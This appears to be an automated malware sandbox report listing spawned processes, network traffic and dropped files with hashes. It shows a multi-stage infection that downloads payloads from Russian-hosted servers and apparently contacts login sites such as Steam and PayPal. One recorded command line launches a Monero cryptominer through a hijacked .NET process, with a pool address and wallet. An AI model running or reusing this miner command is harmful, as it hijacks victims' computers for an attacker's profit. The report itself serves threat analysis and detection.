"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 512 -ip 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\EDEB.exe

C:\Users\Admin\AppData\Local\Temp\EDEB.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe

C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 8.8.8.8:53 24.52.193.212.in-addr.arpa udp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 8.8.8.8:53 edarululoom.com udp
US 188.114.96.2:443 edarululoom.com tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 50.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
BG 95.158.162.200:80 tcp
US 38.47.221.193:34368 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 104.21.65.24:443 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
DE 144.76.136.153:443 tcp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 udp
BG 91.92.243.247:80 tcp
US 38.47.221.193:34368 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
RU 109.107.182.45:80 109.107.182.45 tcp
US 8.8.8.8:53 45.182.107.109.in-addr.arpa udp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
RU 212.193.52.24:80 tcp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 udp
RU 212.193.52.24:80 tcp
US 185.196.8.238:80 tcp
GB 88.221.134.50:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
RU 212.193.52.24:80 tcp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 88.221.134.50:80 tcp
GB 96.17.178.174:80 tcp
US 8.8.8.8:53 udp
GB 96.17.178.174:80 tcp
US 38.47.221.193:34368 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 genesiscarat.com udp
US 193.233.132.51:50500 tcp
RU 92.118.112.94:443 genesiscarat.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 51.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 94.112.118.92.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 host-host-file8.com udp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 213.21.220.222:8080 tcp
US 8.8.8.8:53 222.220.21.213.in-addr.arpa udp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 www.facebook.com udp
FR 157.240.196.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 www.epicgames.com udp
GB 104.103.202.103:443 steamcommunity.com tcp
US 8.8.8.8:53 store.steampowered.com udp
US 34.196.248.146:443 www.epicgames.com tcp
US 8.8.8.8:53 twitter.com udp
US 2.17.5.46:443 store.steampowered.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 35.196.240.157.in-addr.arpa udp
US 8.8.8.8:53 103.202.103.104.in-addr.arpa udp
US 8.8.8.8:53 46.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 146.248.196.34.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
BE 64.233.166.84:443 accounts.google.com tcp
BE 64.233.166.84:443 accounts.google.com udp
US 104.244.42.129:443 twitter.com tcp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 84.166.233.64.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 29.92.85.52.in-addr.arpa udp
GB 172.217.169.46:443 www.youtube.com tcp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
FR 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 68.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 tracking.epicgames.com udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
DE 52.85.92.24:443 static-assets-prod.unrealengine.com tcp
DE 52.85.92.24:443 static-assets-prod.unrealengine.com tcp
GB 104.77.160.220:443 store.akamai.steamstatic.com tcp
GB 104.77.160.220:443 store.akamai.steamstatic.com tcp
GB 104.77.160.220:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
GB 172.217.169.46:443 www.youtube.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 220.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 221.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 24.92.85.52.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 api.x.com udp
US 172.64.150.242:443 api.x.com tcp
US 54.87.226.161:443 tracking.epicgames.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
GB 172.217.16.246:443 i.ytimg.com tcp
US 54.87.226.161:443 tracking.epicgames.com tcp
IE 163.70.147.23:443 static.xx.fbcdn.net tcp
IE 163.70.147.23:443 static.xx.fbcdn.net tcp
IE 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 172.217.16.246:443 i.ytimg.com tcp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 242.150.64.172.in-addr.arpa udp
US 8.8.8.8:53 23.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 246.16.217.172.in-addr.arpa udp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 161.226.87.54.in-addr.arpa udp
US 104.244.42.194:443 api.twitter.com tcp
US 8.8.8.8:53 pbs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 video.twimg.com udp
US 68.232.34.217:443 video.twimg.com tcp
US 104.244.42.133:443 t.co tcp
US 93.184.220.70:443 pbs.twimg.com tcp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 217.34.232.68.in-addr.arpa udp
US 8.8.8.8:53 133.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 70.220.184.93.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
RU 81.19.131.34:80 81.19.131.34 tcp
US 8.8.8.8:53 34.131.19.81.in-addr.arpa udp
US 38.47.221.193:34368 tcp
RU 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 static.ads-twitter.com udp
RU 80.85.241.193:58001 tcp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 193.241.85.80.in-addr.arpa udp
US 8.8.8.8:53 c.paypal.com udp
GB 142.250.200.3:443 www.recaptcha.net tcp
US 199.232.168.157:443 static.ads-twitter.com tcp
US 185.196.8.238:80 185.196.8.238 tcp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
GB 104.77.160.220:443 store.akamai.steamstatic.com tcp
GB 104.77.160.220:443 store.akamai.steamstatic.com tcp
GB 104.77.160.220:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 157.168.232.199.in-addr.arpa udp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
GB 142.250.200.3:443 www.recaptcha.net udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.147.35:443 facebook.com tcp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
GB 104.77.160.221:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 fbcdn.net udp
US 8.8.8.8:53 login.steampowered.com udp
IE 163.70.147.35:443 fbcdn.net tcp
GB 104.103.202.103:443 login.steampowered.com tcp
FR 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 c6.paypal.com udp
US 151.101.1.35:443 c6.paypal.com tcp
DE 52.85.92.24:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 api.steampowered.com udp
GB 104.103.202.103:443 api.steampowered.com tcp
GB 104.103.202.103:443 api.steampowered.com tcp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 104.244.42.194:443 api.twitter.com tcp
US 104.244.42.194:443 api.twitter.com tcp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
RU 80.85.241.193:58001 tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 90.219.19.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 api2.hcaptcha.com udp
US 35.186.247.156:443 sentry.io udp
US 38.47.221.193:34368 tcp
RU 185.17.0.22:39001 tcp
US 8.8.8.8:53 22.0.17.185.in-addr.arpa udp
US 185.196.8.248:80 185.196.8.248 tcp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 248.8.196.185.in-addr.arpa udp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:2222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
DE 162.19.139.184:2222 xmr.2miners.com tcp

Files

memory/4820-2-0x0000000000B20000-0x0000000000C20000-memory.dmp

memory/4820-3-0x0000000000AF0000-0x0000000000AF9000-memory.dmp

memory/1440-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1440-4-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3600-5-0x0000000002B20000-0x0000000002B36000-memory.dmp

memory/1440-8-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4820-13-0x0000000000AF0000-0x0000000000AF9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9C21.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\A818.exe

MD5 85cbae2ab65648044ad190853ca31139
SHA1 23f9b74a2e35782c085d7d4a4d6f56a82e522247
SHA256 68b2ec87b7cfe9cd2b686d53a7cf8a4ae88b33ab20008339c427a9b6409d53d2
SHA512 67585e9e18d7f588b273d2ff207bb661af711ddc0ff360092e1e967e51691ffa6c37900116933d04717d457ac3dd248840dfa7ac75b0f2e793d383f2ed6e56d0

C:\Users\Admin\AppData\Local\Temp\A818.exe

MD5 cb8a377350959c448abfe0e9f535f747
SHA1 4c85085923b61025e95b2086847374ce5940ddb5
SHA256 071594cf7d9056794b1a68bd33f7454bf3711f787b7156e572dca9c8a667cf18
SHA512 5e4cd9a27f28fdb428f4b61e8f95770584ef1d8d9c60978351c0fd30fb4943662758dcfc5937456406c50a9f9334d09c8f7a604933044f7d67ffa8e089ae341d

memory/4612-22-0x00000000008C0000-0x000000000138A000-memory.dmp

memory/4612-23-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/4612-24-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/4612-25-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/4612-26-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/4612-27-0x0000000075900000-0x00000000759F0000-memory.dmp

memory/4612-28-0x0000000076F84000-0x0000000076F86000-memory.dmp

memory/4612-31-0x00000000008C0000-0x000000000138A000-memory.dmp

memory/4612-32-0x0000000008190000-0x0000000008734000-memory.dmp

memory/4612-33-0x0000000007C80000-0x0000000007D12000-memory.dmp

memory/4612-34-0x0000000003080000-0x000000000308A000-memory.dmp

memory/4612-37-0x0000000007C40000-0x0000000007C52000-memory.dmp

memory/4612-36-0x0000000008020000-0x000000000812A000-memory.dmp

memory/4612-38-0x0000000007E50000-0x0000000007E8C000-memory.dmp

memory/4612-35-0x0000000008D60000-0x0000000009378000-memory.dmp

memory/4612-39-0x0000000007E90000-0x0000000007EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C025.exe

MD5 50ac94ef525505be33f5751b79453514
SHA1 1e8fc0ab395b0bed387f6284579d103adcb969cb
SHA256 a4d6e79e3c12d70f003f9e55a2f320e68793f02d178cdab936237cf59730341c
SHA512 9dffe6f9d41431963148291feb398b15dffeddb729ef4fb2f576e24a1456f5ff528793933f606342b0bac91ebf9fe7cb1f51b9f924f01ae0bee3218bb8477ffe

C:\Users\Admin\AppData\Local\Temp\C025.exe

MD5 9cc4e17095e4417c2a18f8573903827e
SHA1 594d436cc196f9654cc612ae637210b271e63218
SHA256 e5f76cd0cb748d7885931115144b3684751e005770b86869e6fd096081d89926
SHA512 8895f38384daa7b5765178e4b6ac2690f56abe2e7c0afe31b0a12d1b642c52a58d5730d49895e92a3c51720257d5f00bc67564711a6b2084c7ef657e40f3ef2e

memory/4240-46-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4240-49-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4240-51-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4240-50-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3008-47-0x0000000002600000-0x000000000271B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C025.exe

MD5 db2ca1b92fa3cc8326b6658c6f439a83
SHA1 03cd67ec4f02ac8129633b140d805783e03192f5
SHA256 be6babccb601ae7a157e9fac2e2a3503cb32bcdf00d180f48b144a4ce04b9aca
SHA512 b0eeec50d98ef6e4c2f1af8b436d6221533983e30c83da1c5388f266ac902a1db8124c3fe8cb499e6f65fc5bbbb4eff4f5e1ff1cf85afbb7898e692014643dad

memory/3008-45-0x0000000000BA0000-0x0000000000C3E000-memory.dmp

C:\Users\Admin\AppData\Local\0c74d987-e07e-499b-b0eb-21eaa09fb6b6\C025.exe

MD5 aaa1bb0ebe54caeeb0bd1607c51721a7
SHA1 c2227093c5892028375f266adae58a40e34b434d
SHA256 5a72636a435d62636867645fefe5c11a66b9d044342d7358bc5c9f00c28e8fd7
SHA512 57a2f1aed9eb17ea9ae0c790b5b429a73aab59a2b3bb5684933563976932bef37d2342644f1e03a2755beb5ef32cf8d5cc58b618519f0102bd4f96c123f88646

memory/4240-61-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C025.exe

MD5 9e45add54bbc81b6015fea96b9598c94
SHA1 f97fa0fa7264bd91e368f828a644ee78a085f292
SHA256 d3ffc5426c0e828a505d55971088cffc5ac0103fd8093dc522da9d0f0c5527ef
SHA512 e7caedbf9becef4bb32d087f7df522d41f7244cb5d563c60aa23919dc28b59a1665e114ad0c94725a7e9353540355231fb4c0be5c03f0299275eb4511c0aef02

memory/3752-64-0x0000000000A40000-0x0000000000AD3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C025.exe

MD5 7495c3dd88067f90b370663b90ca8d1d
SHA1 e91db350abe83b56f3b7b1abde60ff14a6cae246
SHA256 d5a3dae9cd3b076fcd30c32565379e3a0d6b4d5ec7293455adaa3e7908996a59
SHA512 f8b1643ede2056a4c4305ff9e5303ae415eafdd768cc052df2e4f8608458c73f93e36b2ed93f1132a296339e359e7d8e0abe9111434bb260c52c8ca1752e8c5a

memory/3856-67-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C835.exe

MD5 ab6c480932243f50e0a454c56f004271
SHA1 ab3fa047adaffc63ff21affbb859b2c7d9909414
SHA256 11d21d9e82be611845eff6de9e1e6b05c7a37a65dc5ee08e4c7550bab1c2bf91
SHA512 347f965412f9e423a18d1abbd6b77f110d6a95f1e230e3b88c9c12a80d03be6da8b6c9cae6e3b5255269a236e6f8837b9fe6b277fb5955547006857d3ca7bbc9

